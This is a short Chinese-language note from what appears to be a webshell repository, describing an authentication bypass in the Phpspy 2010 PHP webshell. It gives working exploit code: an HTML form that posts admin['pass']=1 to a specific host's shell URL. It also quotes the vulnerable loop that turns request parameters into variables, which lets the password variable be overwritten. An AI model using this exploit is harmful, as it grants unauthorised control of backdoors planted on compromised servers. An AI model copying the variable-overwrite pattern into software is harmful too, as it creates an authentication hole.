webshell/php/Phpspy 2010 身份验证绕过漏洞
tennc df6d55ad4f update
php shell and jsp shell
2013-09-13 10:44:57 +08:00

28 lines
No EOL
723 B
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

Phpspy 2010 身份验证绕过漏洞
作者:我不知道该唱什么 发布时间April 17, 2011 00:21:28 分类tech
利用代码:
<form method="POST" action="http://mirc.3est.com/1.php">
<input type="hidden" name="admin['pass']" value="1">
<input type="submit" value="Login">
</form>
在每次向shell请求数据的时候 都附加post一个admin['pass']即可。
形成原因:
2009不存在该洞仅限2010版本对比二者即可得到答案
利用
foreach(array('_GET','_POST') as $_request) {
foreach($$_request as $_key => $_value) {
if ($_key{0} != '_') {
if (IS_GPC) {
$_value = s_array($_value);
}
$$_key = $_value;
}
}
}
对变量$admin['pass']进行覆盖。